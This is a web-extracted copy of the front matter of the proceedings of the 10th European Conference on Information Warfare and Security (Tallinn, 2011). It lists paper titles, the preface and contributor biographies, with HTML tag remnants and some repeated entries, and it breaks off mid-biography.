(in) Security - Academic Conferences Limited
(in) Security - Academic Conferences Limited
(in) Security - Academic Conferences Limited
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Proceed<strong>in</strong>gs<br />
of the<br />
10th European Conference<br />
on Information Warfare and<br />
<strong>Security</strong><br />
The Institute of Cybernetics at the<br />
Tall<strong>in</strong>n University of Technology<br />
Tall<strong>in</strong>n, Estonia<br />
7-8 July 2011<br />
Edited by<br />
Ra<strong>in</strong> Ottis<br />
Cooperative Cyber Defence<br />
Centre of Excellence<br />
Tall<strong>in</strong>n, Estonia
Copyright The Authors, 2011. All Rights Reserved.<br />
No reproduction, copy or transmission may be made without written permission from the <strong>in</strong>dividual authors.<br />
Papers have been double-bl<strong>in</strong>d peer reviewed before f<strong>in</strong>al submission to the conference. Initially, paper<br />
abstracts were read and selected by the conference panel for submission as possible papers for the<br />
conference.<br />
Many thanks to the reviewers who helped ensure the quality of the full papers.<br />
These Conference Proceed<strong>in</strong>g have been submitted to the Thomson ISI for <strong>in</strong>dex<strong>in</strong>g.<br />
Further copies of this book can be purchased from http://academic-conferences.org/2-proceed<strong>in</strong>gs.htm<br />
ISBN: 978-1-908272-07-2 CD<br />
Published by <strong>Academic</strong> Publish<strong>in</strong>g <strong>Limited</strong><br />
Read<strong>in</strong>g<br />
UK<br />
44-118-972-4148<br />
www.academic-publish<strong>in</strong>g.org
Contents<br />
Paper Title Author(s) Page<br />
No.<br />
Preface iv<br />
Biographies of Conference Chairs, Programme<br />
Chair, Keynote Speaker and M<strong>in</strong>i-track Chairs<br />
Biographies of contribut<strong>in</strong>g authors vi<br />
Legitimate Defenses Aga<strong>in</strong>st Dangerous<br />
Archenemies. The Justifications by U.S.<br />
Presidents for the Initiation of Military<br />
Operations <strong>in</strong> the Persian Gulf and Kosovo,<br />
1991-2003<br />
Use of Compression Methods for Data<br />
<strong>Security</strong> Assurance<br />
Cyber <strong>Security</strong>: Time for Engagement and<br />
Debate<br />
This is not a Cyber war, its a...? Wikileaks,<br />
Anonymous and the Politics of Hegemony<br />
Potential Threats of UAS Swarms and the<br />
Countermeasure’s Need<br />
Develop<strong>in</strong>g Intelligence <strong>in</strong> the Field of<br />
F<strong>in</strong>anc<strong>in</strong>g Terror - an Analytical Model of Anti-<br />
Terror Inter Agency and Cross Border<br />
Cooperation: The <strong>Security</strong> of F<strong>in</strong>ancial<br />
Systems Dimension<br />
A Secure Architecture for Electronic Ticket<strong>in</strong>g<br />
Based on the Portuguese e-ID Card<br />
Evaluation of the Armed Forces Websites of<br />
the European Countries<br />
Estonia After the 2007 Cyber Attacks: Legal,<br />
Strategic and Organisational Changes <strong>in</strong><br />
Cyber <strong>Security</strong><br />
Kari Alenius 1<br />
Dom<strong>in</strong>ic Asamoah and William Oblitey 6<br />
Debi Ashenden 11<br />
David Barnard-Wills 17<br />
Laurent Beaudo<strong>in</strong>, Anto<strong>in</strong>e Gademer,<br />
Loica Avanthey, V<strong>in</strong>cent Germa<strong>in</strong> and<br />
V<strong>in</strong>cent Vittori<br />
v<br />
24<br />
Alexander Bligh 31<br />
Paul Crocker and Vasco Nicolau 38<br />
Pedro Cunha, Parcídio Gonçalves, Vítor<br />
Sá, Sérgio Tenreiro de Magalhães and<br />
Miguel Pimenta<br />
Christian Czosseck, Ra<strong>in</strong> Ottis and<br />
Anna-Maria Talihärm<br />
An Usage-Centric Botnet Taxonomy Christian Czosseck and Karlis Pod<strong>in</strong>s 65<br />
User-Centric Information <strong>Security</strong> Systems - A<br />
Liv<strong>in</strong>g lab Approach<br />
Intrusion Detection Through Keystroke<br />
Dynamics<br />
The Computer <strong>Security</strong> of Public/Open<br />
Computer Spaces: Feedback of a Field Study<br />
<strong>in</strong> Europe<br />
Pervert<strong>in</strong>g eMails: A new Dimension <strong>in</strong> Internet<br />
(<strong>in</strong>)<strong>Security</strong><br />
Evaluat<strong>in</strong>g Cyber <strong>Security</strong> Awareness <strong>in</strong> South<br />
Africa<br />
Moses Dlam<strong>in</strong>i , Jan Eloff, Marek<br />
Ziel<strong>in</strong>ksi , Jason Chuang 1 and Danie<br />
Smit<br />
João Ferreira, Henrique Santos and<br />
Bernardo Patrão<br />
50<br />
57<br />
73<br />
81<br />
Eric Filiol 91<br />
Eric Filiol, Jonathan Dechaux and Jean-<br />
Paul Fiza<strong>in</strong>e<br />
Marthie Grobler, Joey Jansen van<br />
Vuuren and Jannie Zaaiman<br />
i<br />
106<br />
113
Paper Title Author(s) Page<br />
No.<br />
Missionaries of Peace – The Creation of the<br />
Italian Identity <strong>in</strong> the Representation of the<br />
Political Discussion <strong>in</strong> Favour of Italy’s<br />
Participation <strong>in</strong> the Iraq War <strong>in</strong> Il Corriere della<br />
Sera<br />
Thoughts of war Theorists on Information<br />
Operations<br />
Live-Action Role-Play as a Scenario-Based<br />
Tra<strong>in</strong><strong>in</strong>g Tool for <strong>Security</strong> and Emergency<br />
Services<br />
Computer Games as the Representation of<br />
Military Information Operations – A<br />
Philosophical Description of Cyborgiz<strong>in</strong>g of<br />
Propaganda Warfare<br />
Information <strong>Security</strong> Culture or Information<br />
Safety Culture – What do Words Convey?<br />
Strategic Communication and Revolution <strong>in</strong><br />
Military Affairs: Describ<strong>in</strong>g Actions and Effects<br />
A Case-Study on American Perspectives on<br />
Cyber and <strong>Security</strong><br />
Evolutionary Algorithms for Optimal Selection<br />
of <strong>Security</strong> Measures<br />
Botnet Detection: A Numerical and Heuristic<br />
Analysis<br />
Analysis and Modell<strong>in</strong>g of Critical<br />
Infrastructure Systems<br />
Modell<strong>in</strong>g Relational Aspects of Critical<br />
Infrastructure Systems<br />
A Study on Cyber Secured eGovernance <strong>in</strong> an<br />
Educational Institute: Performance and User<br />
Satisfaction<br />
Steps towards Monitor<strong>in</strong>g Cyberarms<br />
Compliance<br />
Distributed Denial of Service Attacks as Threat<br />
Vectors to Economic Infrastructure: Motives,<br />
Estimated Losses and Defense Aga<strong>in</strong>st the<br />
HTTP/1.1 GET and SYN Floods Nightmares<br />
Legal Protection of Digital Information <strong>in</strong> the<br />
era of Information Warfare<br />
Criteria for a Personal Information <strong>Security</strong><br />
Agent<br />
International Crim<strong>in</strong>al Cooperation <strong>in</strong> the<br />
Context of Cyber Incidents<br />
Methods for Detect<strong>in</strong>g Important Events and<br />
Knowledge From Data <strong>Security</strong> Logs<br />
Marja Härmänmaa 122<br />
Arto Hirvelä 127<br />
Sara Hjalmarsson 132<br />
Aki-Mauri Huht<strong>in</strong>en 141<br />
Ilona Ilvonen 148<br />
Saara Jantunen 155<br />
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en 163<br />
Jüri Kivimaa and Toomas Kirt 172<br />
Luís Mendonça and Henrique Santos 185<br />
Graeme Pye and Matthew Warren 194<br />
Graeme Pye and Matthew Warren 202<br />
Kasi Raju 211<br />
Neil Rowe, Simson Garf<strong>in</strong>kel, Robert<br />
Beverl, and Panayotis Yannakogeorgos<br />
221<br />
Libor Sarga and Roman Jašek 228<br />
Małgorzata Skórzewska-Amberg 237<br />
Ewald Stieger and Rossouw von Solms 245<br />
Anna-Maria Talihärm 253<br />
Risto Vaarandi 261<br />
Locat<strong>in</strong>g the Enemy Marja Vuor<strong>in</strong>en 267<br />
Australian National Critical Infrastructure<br />
Protection: A Case Study<br />
ii<br />
Matthew Warren and Shona Leitch 375
Paper Title Author(s) Page<br />
No.<br />
PhD Papers 281<br />
<strong>Security</strong> Considerations for Virtual Platform<br />
Provision<strong>in</strong>g<br />
Mudassar Aslam and Christian<br />
Gehrmann<br />
A Mobile and Quick Terrorism Anthony Desnos and Geoffroy Gueguen 291<br />
Regulatory Compliance to Ensure Information<br />
<strong>Security</strong>: F<strong>in</strong>ancial Supervision Perspective<br />
Behaviour Profil<strong>in</strong>g for Transparent<br />
Authentication for Mobile Devices<br />
Description of a Practical Application of an<br />
Information <strong>Security</strong> Audit Framework<br />
Fight Over Images of the State Armed Forces<br />
and Private <strong>Security</strong> Contractors<br />
283<br />
Andro Kull 298<br />
Fudong Li, Nathan Clarke, Maria<br />
Papadaki and Paul Dowland<br />
307<br />
Teresa Pereira and Henrique Santos 315<br />
Mirva Salm<strong>in</strong>en 323<br />
Non <strong>Academic</strong>s 331<br />
A Proposal for Doma<strong>in</strong> Name System (DNS)<br />
<strong>Security</strong> Metrics Framework<br />
Andrea Rigoni and Salvatore Di Blasi 333<br />
Work <strong>in</strong> progress 337<br />
Malicious Flash Crash Attacks by Quote<br />
Stuff<strong>in</strong>g: This is the way the (F<strong>in</strong>ancial) World<br />
Could end<br />
iii<br />
Robert Erra 339
Preface<br />
This year sees the 10th European Conference on Information Warfare and <strong>Security</strong> (ECIW 2011), which is<br />
hosted by the Institute of Cybernetics (IoC) at Tall<strong>in</strong>n University of Technology <strong>in</strong> collaboration with the<br />
Cooperative Cyber Defence Centre of Excellence (CCD COE) <strong>in</strong> Tall<strong>in</strong>n, Estonia. The Conference Chair is<br />
Vahur Kotkas from IoC and I am pleased to be the Programme Chair.<br />
The Conference cont<strong>in</strong>ues to br<strong>in</strong>g together <strong>in</strong>dividuals work<strong>in</strong>g <strong>in</strong> the area of Information Warfare and<br />
Information <strong>Security</strong> <strong>in</strong> order to share knowledge and develop new ideas with their peers. The range of<br />
papers presented at the Conference will ensure two days of <strong>in</strong>terest<strong>in</strong>g discussions. The topics covered this<br />
year illustrate the depth of the <strong>in</strong>formation operations’ research area, with the subject matter rang<strong>in</strong>g from the<br />
highly technical to the more strategic visions of the use and <strong>in</strong>fluence of <strong>in</strong>formation.<br />
The open<strong>in</strong>g keynote is given by Mr Raul Rebane from StratCom and the second day will be opened by Prof<br />
Enn Tyugu from CCD COE and IoC.<br />
With an <strong>in</strong>itial submission of 83 abstracts, after the double bl<strong>in</strong>d, peer review process there are 53 papers<br />
published <strong>in</strong> these Conference Proceed<strong>in</strong>gs. These papers come from all parts of the globe <strong>in</strong>clud<strong>in</strong>g<br />
Australia, Austria, Egypt, Estonia, F<strong>in</strong>land, France, Germany, Greece, India, Kuwait, Pakistan, Portugal,<br />
Romania, South Africa, Sweden, United K<strong>in</strong>gdom and the United States of America.<br />
I wish you a most <strong>in</strong>terest<strong>in</strong>g conference and an enjoyable stay <strong>in</strong> Estonia.<br />
Ra<strong>in</strong> Ottis, PhD<br />
July 2011<br />
iv
Biographies of Conference Chairs, Programme Chairs<br />
and Keynote Speakers<br />
Conference Chair<br />
Programme Chairs<br />
Vahur Kotkas is a Development Manager of the Institute of Cybernetics at Tall<strong>in</strong>n<br />
University of Technology, Tall<strong>in</strong>n, Estonia. His research and activities are mostly related to<br />
eng<strong>in</strong>eer<strong>in</strong>g, model<strong>in</strong>g and simulations where Knowledge- and Logic-Based techniques are<br />
developed and applied <strong>in</strong> order to achieve comfortable and efficent platforms for model<strong>in</strong>g<br />
and for simulations. Dur<strong>in</strong>g the past few years Vahur has been active <strong>in</strong> Cyber <strong>Security</strong><br />
related research under a contract with Estonian MoD to develop suitable tools for Cyber<br />
Defence.<br />
Ra<strong>in</strong> Ottis is a scientist at the Cooperative Cyber Defence Centre of Excellence. He<br />
previously served as a communications officer <strong>in</strong> the Estonian Defence Forces,<br />
focus<strong>in</strong>g primarily on cyber defence tra<strong>in</strong><strong>in</strong>g and awareness issues. He is a graduate<br />
of the United States Military Academy (BS, Computer Science) and Tall<strong>in</strong>n University<br />
of Technology (MSc, Informatics). He ga<strong>in</strong>ed his PhD from Tall<strong>in</strong>n University of<br />
Technology, where his research focused on politically motivated cyber attack<br />
campaigns by non-state actors. Other research <strong>in</strong>terests <strong>in</strong>clude cyber conflict and<br />
politically motivated cyber attacks.<br />
M<strong>in</strong>i Track Chairs<br />
Debi Ashendeni is a Senior Research Fellow with<strong>in</strong> the Defence College of Management<br />
and Technology at Cranfield University. Prior to tak<strong>in</strong>g up this post she was a Manag<strong>in</strong>g<br />
Consultant with<strong>in</strong> Q<strong>in</strong>etiQ’s Trusted Information Management Department (formerly the<br />
Defence Evaluation Research Agency). Specialis<strong>in</strong>g <strong>in</strong> <strong>in</strong>formation assurance <strong>in</strong> general,<br />
and risk assessment <strong>in</strong> particular, other specific areas of <strong>in</strong>terest <strong>in</strong>clude build<strong>in</strong>g trust for<br />
<strong>in</strong>formation shar<strong>in</strong>g, governance processes for <strong>in</strong>formation assurance and <strong>in</strong>formation<br />
security awareness. Debi has worked extensively across government, defence and the<br />
f<strong>in</strong>ance sector as a consultant and her work concentrates on understand<strong>in</strong>g the role of <strong>in</strong>dividuals <strong>in</strong> ensur<strong>in</strong>g<br />
that security risks are mitigated. Debi has had a number of articles on <strong>in</strong>formation security published,<br />
presented at a range of conferences and has co-authored a book for Butterworth He<strong>in</strong>emann ‘Risk<br />
Management for Computer <strong>Security</strong>: Protect<strong>in</strong>g Your Network & Information Assets’. Her current research<br />
exam<strong>in</strong>es the practice of <strong>in</strong>formation operations us<strong>in</strong>g discourse analysis.<br />
Eric Adrien Filiol has been an officer <strong>in</strong> the French Army for 20 years. He is now head<br />
scientist officer and professor <strong>in</strong> a research lab work<strong>in</strong>g for different department <strong>in</strong><br />
France (justice, police and defense). He holds a PhD <strong>in</strong> mathematics and computer<br />
science, a habilitation thesis <strong>in</strong> computer science, an eng<strong>in</strong>eer diploma <strong>in</strong> cryptology<br />
and has graduated from NATO <strong>in</strong> InfoOps. His research works relates to computer<br />
security (especially computer virology and cryptanalysis) and cyber warfare with the<br />
attacker’s m<strong>in</strong>d.<br />
Dr. Marja Härmänmaa is a university lecturer <strong>in</strong> Italian at the University of Hels<strong>in</strong>ki. In<br />
addition to Critical Discourse Analyses and critical read<strong>in</strong>g, her research <strong>in</strong>terests <strong>in</strong>clude<br />
Italian literature and culture of the early 20th century.<br />
Professor, LTC(G.S), Aki Huht<strong>in</strong>en, PhD is Docent of practical philosophy <strong>in</strong> the<br />
University of Hels<strong>in</strong>ki and Docent of social consequences of media and <strong>in</strong>formation<br />
technology <strong>in</strong> the University of Lapland. He is also Docent of <strong>in</strong>formation security and<br />
<strong>in</strong>formation operations <strong>in</strong> the University of Tampere Technology. Aki works at the<br />
Department of Leadership and Military Pedagogy at the F<strong>in</strong>nish National Defence<br />
University.<br />
v
Saara Jantunen has studied English language and culture <strong>in</strong> the University of Gron<strong>in</strong>gen<br />
<strong>in</strong> the Netherlands and English philology <strong>in</strong> the University of Hels<strong>in</strong>ki. Her research<br />
<strong>in</strong>terests are language & identity and military discourse. Jantunen currently works <strong>in</strong><br />
education.<br />
Marja Vuor<strong>in</strong>en is a social historian specializ<strong>in</strong>g <strong>in</strong> the study of elites and power<br />
with<strong>in</strong> a theoretical framework of semiotics, text analysis and media studies. Marja<br />
holds a Doc. Soc. Sci. from the University of Hels<strong>in</strong>ki<br />
Dr. Ken Webb first career was <strong>in</strong> government special operations <strong>in</strong>clud<strong>in</strong>g command of<br />
strategic counter-terrorist, <strong>in</strong>telligence-gather<strong>in</strong>g and unconventional warfare units.<br />
Operations <strong>in</strong> the <strong>in</strong>ternational security field then followed where he developed a network of<br />
geostrategic relationships. Ken has completed an <strong>in</strong>terdiscipl<strong>in</strong>ary PhD level government<br />
research project <strong>in</strong>to enhanc<strong>in</strong>g national security from terrorist groups and has also been<br />
the counter-terrorism research leader for another Government <strong>in</strong>itiative to identify and foster<br />
multi-discipl<strong>in</strong>ary research <strong>in</strong>to safeguard<strong>in</strong>g countries from natural, human-caused, or<br />
accidental and terrorist acts. His exposure to and research experience is <strong>in</strong> special operations, <strong>in</strong>formation<br />
warfare, national security and emergencies, organised crime and counter-terrorism.<br />
Biographies of contribut<strong>in</strong>g authors (<strong>in</strong> alphabetical order)<br />
Kari Alenius is Assistant Professor <strong>in</strong> the Department of History at the University Of Oulu, F<strong>in</strong>land. His<br />
research <strong>in</strong>terests <strong>in</strong>clude the history of propaganda and mental images, the history of Estonia between the<br />
World Wars and the history of ethnic m<strong>in</strong>orities.<br />
Dom<strong>in</strong>ic Asamoah holds a 2009 M. Phil degree In Computer Science from the Kwame .Nkrumah University<br />
of Science and Technology. He is a lecturer of Computer Science at that University.<br />
Mudassar Aslam is a researcher <strong>in</strong> Swedish Institute of Computer Science (SICS) s<strong>in</strong>ce March 2010. He is<br />
also registered as a PhD student <strong>in</strong> Mälardalens University, Västerås. He has his Masters <strong>in</strong> Information and<br />
Communication Systems <strong>Security</strong> from KTH. Currently, he is work<strong>in</strong>g on <strong>Security</strong> and Trust establishment <strong>in</strong><br />
virtualized environments and clouds.<br />
David Barnard-Wills is a Research Fellow <strong>in</strong> the Department of Informatics and Sensors, Cranfield<br />
University. He has previously worked <strong>in</strong> the School of Political Science and International Studies, the<br />
University of Birm<strong>in</strong>gham, and for the Parliamentary Office of Science and Technology. Research <strong>in</strong>terests<br />
<strong>in</strong>clude the politics of technology, surveillance and privacy.<br />
Laurent Beaudo<strong>in</strong> received a PhD from Télécom Paristech <strong>in</strong> image process<strong>in</strong>g and remote sens<strong>in</strong>g. He<br />
has worked <strong>in</strong> Ecole Supérieure d'Informatique d'Electronique et d'Automatique (ESIEA), a french<br />
eng<strong>in</strong>eer<strong>in</strong>g school, s<strong>in</strong>ce 2001. He founded <strong>in</strong> 2004 the Image and Signal Process<strong>in</strong>g R&D department<br />
(ATIS laboratory). His ma<strong>in</strong> research activities concern Defence and <strong>Security</strong>, explor<strong>in</strong>g robots (UAS, AUV),<br />
remote sens<strong>in</strong>g and ICTs for persons with disabilities.<br />
Alexander Bligh PhD (Columbia University, 1981) - Former advisor to the PM of Israel. President, Strategic<br />
Objects, an <strong>in</strong>ternational strategic consult<strong>in</strong>g firm. Former Chair of the Department of Political Science and<br />
Middle Eastern Studies, Ariel University Center, Israel, and visit<strong>in</strong>g professor at Columbia University, U of<br />
Toronto, U of Notre Dame, etc.<br />
Joob<strong>in</strong> Choob<strong>in</strong>eh has a PhD from the University of Arizona. Research areas <strong>in</strong>clude Information <strong>Security</strong>,<br />
Management Information Systems, and Systems Analysis and Design. He has authored or been a coauthor<br />
of more than fifty (50) research articles. He is an Associate Editor of INFORMS Journal on Comput<strong>in</strong>g and<br />
serves on the editorial board of the International Journal of Bus<strong>in</strong>ess Information Systems.<br />
Paul Crocker has a PhD <strong>in</strong> Mathematics from the University of Leeds, UK. After work<strong>in</strong>g <strong>in</strong> software<br />
development he jo<strong>in</strong>ed the Computer Science Department at the University of Beira Interior, Portugal. His<br />
vi
esearch and teach<strong>in</strong>g <strong>in</strong>terest <strong>in</strong>clude Parallel Comput<strong>in</strong>g, <strong>Security</strong> and Operat<strong>in</strong>g systems. He is a member<br />
of the Portuguese research Institute of Telecommunications.<br />
Christian Czosseck is scientist at the CCD COE <strong>in</strong> Tall<strong>in</strong>n, Estonia. Serv<strong>in</strong>g <strong>in</strong> the German military for more<br />
than 12 years, he held several <strong>in</strong>formation assurance positions. Christian holds a M.Sc. equivalent <strong>in</strong><br />
computer science and is currently PhD student at the Estonian Bus<strong>in</strong>ess School <strong>in</strong> Tall<strong>in</strong>n look<strong>in</strong>g <strong>in</strong>to cyber<br />
security and botnet related issues.<br />
Anthony Desnos is currently a PhD Student at ESIEA (Operational Cryptology and Virology Laboratory) <strong>in</strong><br />
Laval, France. He is <strong>in</strong>volved <strong>in</strong> a number of open source security projects like Androguard. He had been<br />
speaker <strong>in</strong> various security/virology/<strong>in</strong>formation warfares conferences on different topics, <strong>in</strong>clud<strong>in</strong>g hack.lu,<br />
eicar, eciw, iawacs<br />
Moses Dlam<strong>in</strong>i received his BSc Computer Science and Mathematics at the University of Swaziland. He<br />
received his BSc Honours and MSc <strong>in</strong> Computer Science at the University of Pretoria, where he has now<br />
enrolled for a doctorate degree. Moses works at SAP Research Pretoria, as a PhD research associate.<br />
Salvatore Di Blasi is an Information security professional with a solid track record <strong>in</strong> secure software design<br />
and development; he is a Certified Professional Eng<strong>in</strong>eer and qualified as a ISO 27001 Lead Auditor. He<br />
currently works at Global Cyber <strong>Security</strong> Center (GCSEC) as an <strong>in</strong>formation security researcher.<br />
Robert Erra is Professor of CS and Scientific Director of the Masters <strong>in</strong> Network & Information <strong>Security</strong> at<br />
ESIEA Paris and Laval. He is <strong>in</strong>terested <strong>in</strong> developments of algorithms for <strong>in</strong>formation security, from<br />
cryptanalysis of asymmetric cryptography to malware analysis.<br />
João Ferreira is an Informatics Eng<strong>in</strong>eer<strong>in</strong>g MSc student enthusiastic about Information <strong>Security</strong>, and the<br />
field of Biometric <strong>Security</strong> <strong>in</strong> particular. For his ongo<strong>in</strong>g thesis, he is currently research<strong>in</strong>g methods for<br />
strengthen<strong>in</strong>g the reliability of Data Centric <strong>Security</strong> solutions.<br />
Arto Hirvelä (Major) is an <strong>in</strong>structor (leadership) <strong>in</strong> Research Group at the F<strong>in</strong>nish National Defence<br />
University. His research <strong>in</strong>terests are <strong>in</strong>formation environment and <strong>in</strong>formation operations.<br />
Sara Hjalmarsson is a security science honours student at Edith Cowan University of Perth, Western<br />
Australia. Her research revolves around the application of techniques from Live-Action Role-Play (LARP) to<br />
scenario-based tra<strong>in</strong><strong>in</strong>g. Sara has 10 years experience as an educator, participant and organiser of LARP <strong>in</strong><br />
Sweden and abroad. She currently resides <strong>in</strong> Sweden.<br />
Ilona Ilvonen is a doctoral student at Tampere University of Technology, department of Bus<strong>in</strong>ess<br />
Information Management and Logistics. Her doctoral thesis topic is the management of knowledge security,<br />
and the thesis is due <strong>in</strong> 2012. She has published conference papers on <strong>in</strong>formation security management,<br />
knowledge management and relat<strong>in</strong>g topics s<strong>in</strong>ce the year 2003.<br />
Abhaya Induruwa PhD, FBCS, FIET, FIESL, HonFCSSL, CEng, CITP, Int. PEng, is the Programme<br />
Director for MSc Forensic Comput<strong>in</strong>g and MSc Cybercrime Forensics of the Canterbury Christ Church<br />
University, United K<strong>in</strong>gdom. His research <strong>in</strong>terests <strong>in</strong>clude Pedagogic Issues <strong>in</strong> Cybercrime Forensics<br />
Education & Tra<strong>in</strong><strong>in</strong>g. His PhD supervisions <strong>in</strong>clude the automation of mobile phone forensic <strong>in</strong>vestigation.<br />
Saara Jantunen has studied English language and culture <strong>in</strong> the University of Gron<strong>in</strong>gen <strong>in</strong> the Netherlands<br />
and English philology <strong>in</strong> the University of Hels<strong>in</strong>ki. Her research <strong>in</strong>terests are language & identity and military<br />
discourse. Jantunen currently works <strong>in</strong> education.<br />
Saara Jantunen has studied English language and culture <strong>in</strong> the University of Gron<strong>in</strong>gen <strong>in</strong> the Netherlands<br />
and English philology <strong>in</strong> the University of Hels<strong>in</strong>ki. Her research <strong>in</strong>terests are language & identity and military<br />
discourse. Jantunen currently works <strong>in</strong> education.<br />
Toomas Kirt is a post-doc researcher at University of Tartu. In 2007 he received a PhD from Tall<strong>in</strong>n<br />
University of Technology. Research <strong>in</strong>terests <strong>in</strong>clude artificial <strong>in</strong>telligence, neural networks, pattern<br />
recognition and self-organization.<br />
Jyri Kivimaa is a scientist at NATO Cooperative Cyber Defence Center of Excellence. He graduated from<br />
Tall<strong>in</strong>n University of Technology <strong>in</strong> 1972 and s<strong>in</strong>ce 2009 he is a doctoral student at the Estonian Bus<strong>in</strong>ess<br />
School.<br />
vii
Noora Kotila<strong>in</strong>en (Master.Soc.Sci.) is a doctoral candidate at the Hels<strong>in</strong>ki University social science history<br />
department, and is work<strong>in</strong>g as a visit<strong>in</strong>g scholar at The F<strong>in</strong>nish Institute of International Affairs and as a<br />
researcher at Academy of F<strong>in</strong>land research project Ethics, Politics and Emergencies -Humanitarian Frame<br />
for Co-option and Collaboration <strong>in</strong> World Politics.<br />
Andro Kull is a Doctoral student at the University of Tampere s<strong>in</strong>ce 2005 and has graduated at University of<br />
Tartu <strong>in</strong> applied <strong>in</strong>formatics and Tall<strong>in</strong>n University <strong>in</strong> IT management. Last academic conference experience<br />
is from annual <strong>Security</strong> Conference held <strong>in</strong> Last Vegas 2010. The practical side, he was l<strong>in</strong>ked to security<br />
issues, and more recently <strong>in</strong> relation to f<strong>in</strong>ancial supervision. To ensure theoretical knowledge and practical<br />
experience, he has earned <strong>in</strong>ternational certifications CISA, CISM, and ABCP.<br />
Fudong Li is a PhD student with<strong>in</strong> the Centre for <strong>Security</strong>, Communication and Network Research at the<br />
University of Plymouth, where he previously completed a MRes degree on the subject of Network Systems<br />
Eng<strong>in</strong>eer<strong>in</strong>g. His research <strong>in</strong>terests are <strong>in</strong>trusion detection systems, mobile phone security, and user’s<br />
behaviour with<strong>in</strong> mobile device environment.<br />
Luís Costa Mendonça is currently f<strong>in</strong>ish<strong>in</strong>g the Master’s degree <strong>in</strong> Communication Networks and Services<br />
Eng<strong>in</strong>eer<strong>in</strong>g (MERSCOM) <strong>in</strong> University of M<strong>in</strong>ho. He has also been work<strong>in</strong>g <strong>in</strong> the IT <strong>in</strong>dustry for 12 year<br />
now <strong>in</strong> areas that span from software development to Datacenter design and ma<strong>in</strong>tenance. In the last years<br />
he has been digg<strong>in</strong>g deeper <strong>in</strong>to network security.<br />
Daniel NG, Ch<strong>in</strong>g WA started the career as computer programmer <strong>in</strong> 1990, and then progress<strong>in</strong>g towards<br />
ICT <strong>Security</strong>, Computer Forensics, F<strong>in</strong>ancial Account<strong>in</strong>g and Audit<strong>in</strong>g after millennium. Recently, he starts<br />
his PhD (<strong>Security</strong> & Forensics) <strong>in</strong> a UK reputable <strong>in</strong>stitute and The Hong Kong Daniel Polytechnic University,<br />
after earn<strong>in</strong>g a good stock options as a corporate director <strong>in</strong> a listed entity<br />
William Oblitey holds a 1988 Ph. D. degree <strong>in</strong> Computer and Information Sciences from the University of<br />
Pittsburgh. He is a professor of Computer Science at the Indiana University of.Pennsylvania.<br />
Kasi Raju is a Technical Super<strong>in</strong>tendent <strong>in</strong> the Department of Computer Science and Eng<strong>in</strong>eer<strong>in</strong>g, Indian<br />
Institute of Technology - Madras, India. Post graduation <strong>in</strong> Mathematics <strong>in</strong> Loyola college Madras (1981).<br />
Involved <strong>in</strong> Systems and Network adm<strong>in</strong>istration. Recentlly acquired MBA( e-Governance ), PGD ( Cyber<br />
Laws ), PGD ( Cyber <strong>Security</strong> ) and DIP( Cyber Crime Prosecution and Defence ). Currently work<strong>in</strong>g <strong>in</strong> e-<br />
Governance, Cyber Forensics and Cyber <strong>Security</strong>.<br />
Francisco Ribeiro is a student of Masters <strong>in</strong> Computer Eng<strong>in</strong>eer<strong>in</strong>g from the University of M<strong>in</strong>ho. His<br />
specialization are "Network Eng<strong>in</strong>eer<strong>in</strong>g and Services" and "Encryption and <strong>Security</strong> of Information<br />
Systems". Also held a research fellowship <strong>in</strong> the field of bio<strong>in</strong>formatics.<br />
Andrea Rigoni is Director General of the Global Cyber <strong>Security</strong> Center.With a work<strong>in</strong>g experience of 20<br />
years <strong>in</strong> the Information <strong>Security</strong> field, he is an expert on Cyber <strong>Security</strong>, Threat Awareness, Information<br />
Shar<strong>in</strong>g and Incident and Crisis Management. Member of different expert groups, and he is actively <strong>in</strong>volved<br />
<strong>in</strong> many International and European <strong>in</strong>itiatives.<br />
Neil Rowe is Professor of Computer Science at the U.S. Naval Postgraduate School where he has been<br />
s<strong>in</strong>ce 1983. He has a Ph.D. <strong>in</strong> Computer Science from Stanford University (1983). His ma<strong>in</strong> research<br />
<strong>in</strong>terests are the model<strong>in</strong>g of deception, <strong>in</strong>formation security, surveillance systems, image process<strong>in</strong>g, and<br />
data m<strong>in</strong><strong>in</strong>g.<br />
Teresa Pereira is an Assistant lecturer, Superior School of Bus<strong>in</strong>ess Studies, Polytechnic Institute of Viana<br />
do Castelo. PhD student, Department of Information Systems, University of M<strong>in</strong>ho. Graduated <strong>in</strong><br />
Mathematics and Computer Science, University of M<strong>in</strong>ho (2002), obta<strong>in</strong>ed MSc degree <strong>in</strong> Information<br />
Technologies (pre-Bologna) 2006. 2002-2004 worked as researcher <strong>in</strong> OmniPaper project (IST-2001-32174)<br />
funded under 5th Fifth Framework Programme. Research <strong>in</strong>terests: Semantic Web, Information<br />
management, ontologies, security audit, management <strong>in</strong>formation systems and <strong>in</strong>formation systems security.<br />
Vítor Sá holds a five-year "licentiate" degree <strong>in</strong> Systems and Informatics Eng<strong>in</strong>eer<strong>in</strong>g and a Masters <strong>in</strong><br />
Computer Science. Ma<strong>in</strong> activity has been teach<strong>in</strong>g <strong>in</strong> higher education (currently at the Portuguese Catholic<br />
University). Lived for four years <strong>in</strong> Germany as a Guest Researcher at Fraunhofer IGD. He is do<strong>in</strong>g his Ph.D.<br />
work <strong>in</strong> Biometric Authentication.<br />
Mirva Salm<strong>in</strong>en is a PhD student at the University of Tampere research<strong>in</strong>g on outsourc<strong>in</strong>g of the state’s<br />
security functions. She has studied International Relations and Political Science at the University of<br />
viii
Tampere, Military History and Strategy at the F<strong>in</strong>nish National Defence University, and <strong>Security</strong> Studies at<br />
Aberystwyth University <strong>in</strong> the United K<strong>in</strong>gdom.<br />
Henrique D<strong>in</strong>is Santos has a Degree <strong>in</strong> Electric and Electronic Eng<strong>in</strong>eer<strong>in</strong>g, University of Coimbra,<br />
Portugal, 1984, PhD <strong>in</strong> Computer Eng<strong>in</strong>eer<strong>in</strong>g, University of the M<strong>in</strong>ho, Portugal. 1996. Currently Associate<br />
Professor, Information Systems Department, University of M<strong>in</strong>ho, responsible for graduate/postgraduate<br />
courses. Supervision of several dissertations, <strong>in</strong> Information <strong>Security</strong> and Computer Architecture areas.<br />
President of a national Technical Committee (CT 136) related with <strong>in</strong>formation system security standards.<br />
1990, under ERASMUS program, teach<strong>in</strong>g at University of Bristol, UK, where recognized as University<br />
<strong>Academic</strong> staff.<br />
Libor Sarga is a doctoral worker at Department of Statistics and Quantitative Methods, Faculty of<br />
Management and Economics, Tomas Bata University <strong>in</strong> Zlín. His dissertation work will focus on security and<br />
